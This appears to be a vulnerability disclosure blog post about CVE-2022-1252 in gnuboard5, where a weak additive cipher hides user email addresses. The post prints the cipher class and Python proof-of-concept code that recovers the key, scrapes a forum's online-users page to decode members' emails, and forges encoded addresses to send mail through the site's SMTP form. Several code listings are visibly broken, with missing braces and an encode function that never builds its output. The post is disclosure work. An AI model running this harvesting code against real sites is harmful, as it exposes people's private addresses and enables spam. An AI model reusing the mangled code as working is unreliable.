This vulnerability was found on the popular forum platform gnuboard5. A vignette cipher is used to obfuscate user’s email addresses when these are sent to the front-end.


A weak obfuscation algorithm in the str_encrypt class leads to email disclosure on forum’s /bbs/current_connect.php and /bbs/profile.php endpoints. And to full, unrestricted access to the webserver’s SMTP functionality using the /bbs/formmail_send.php endpoint.

Using a known-plaintext attack, the cipher key used by the str_encrypt encrypt function can be calculated, which in turn allows a malicious actor to de-obfuscate all user email addresses. The str_encrypt class looks as follows:

class str_encrypt
var $salt;
var $lenght;

    function __construct($salt='')
            $this->salt = md5(preg_replace('/[^0-9A-Za-z]/', substr(G5_MYSQL_USER, -1), $_SERVER['SERVER_SOFTWARE'].$_SERVER['DOCUMENT_ROOT']));
            $this->salt = $salt;

        $this->length = strlen($this->salt);

    function encrypt($str)
        $length = strlen($str);
        $result = '';

        for($i=0; $i<$length; $i++) {
            $char    = substr($str, $i, 1);
            $keychar = substr($this->salt, ($i % $this->length) - 1, 1);
            $char    = chr(ord($char) + ord($keychar));
            $result .= $char;

        return strtr(base64_encode($result) , '+/=', '._-');

    function decrypt($str) {
        $result = '';
        $str    = base64_decode(strtr($str, '._-', '+/='));
        $length = strlen($str);

        for($i=0; $i<$length; $i++) {
            $char    = substr($str, $i, 1);
            $keychar = substr($this->salt, ($i % $this->length) - 1, 1);
            $char    = chr(ord($char) - ord($keychar));
            $result .= $char;

        return $result;
This code simply takes each character of the input string and key, gets the decimal representation of both and adds them together, then returns the character represented by that number. To de-cipher strings, the same is done but in reverse.

Proof of Concept

After collecting the ciphertext of your own email address on the /bbs/current_connect.php endpoint, the following python code can be used to calculate the key :

def get_key(encoded,decoded):
    bytes_encoded = base64.b64decode(encoded.replace('.', '+').replace('_', '/').replace('-', '='))
    bytes_decoded = bytearray(decoded,"utf-8")
    i = 0
    output = ""
    for b in bytes_encoded:
        output += chr(b-bytes_decoded[i])
        i += 1
    return output

The following code can then be used to decipher other email addresses of online users or users who have their profile publicly visible. It is interesting to note that even users who have the “Let others see my information.” box ticked off, still have their email exposed on the /bbs/current_connect.php page.

key = get_key("kZKTlJWWl5iZmsLDxMXGx8fGxcSixrGZpKahmWGVoJ0-","")
def decode_email(encoded):
    encoded = encoded.replace('.', '+').replace('_', '/').replace('-', '=')
    encoded_bytes = base64.b64decode(encoded)
    output = ""
    i = 0
    for b in encoded_bytes:
        output += chr(b - ord(key[i]))
        i += 1
        if i == len(key):
            i = 0
    return output

r = requests.get("https://forum.example/bbs/current_connect.php")
matches = re.findall(r"formmail\.php\?mb_id=(.*?)&amp;name=(.*?)&amp;email=(.*?)\"", r.text)
matches = list(set(matches))#remove duplicates

for match in matches:
	id = match[0]
	name = unquote(match[1])
	email = decode_email(match[2])
	print("{} : {} : {}".format(id,name,email))

Alternatively, the following code can be used to create a ciphertext of any email address.

def encode_email(email):
    output_arr = []
    i = 0
    for ch in email:  
        i += 1
        if i == len(key):
            i = 0
    output = str(base64.b64encode(bytearray(output_arr)))
    return output.replace('+', '.').replace('/', '_').replace('=', '-')
Which can then be used to send an email to it by making a POST request to the /bbs/formmail_send.php endpoint with the following data:

to: encoded-email
attach: 2
fnick: from-username
fmail: from-mail
subject: subject
type: 0
content: mail body
file1: (binary)
file2: (binary)
captcha_key: captcha answer

Disclosure timeline

  • 25/12/2021 - Initial discovery
  • 28/12/2021 - Reported to maintainer at
  • 17/03/2022 - Maintainer was unable to reproduce the issue on a non-default installation
  • 19/03/2022 - I was still able to reproduce the issue on a default installation, and updated the report to reflect this
  • 28/03/2022 - Blog post published

This vulnerability has been assigned CVE-2022-1252.


As the age-old mantra goes; don’t roll your own crypto. In this case no cryptography was even used, despite what the function’s name might imply.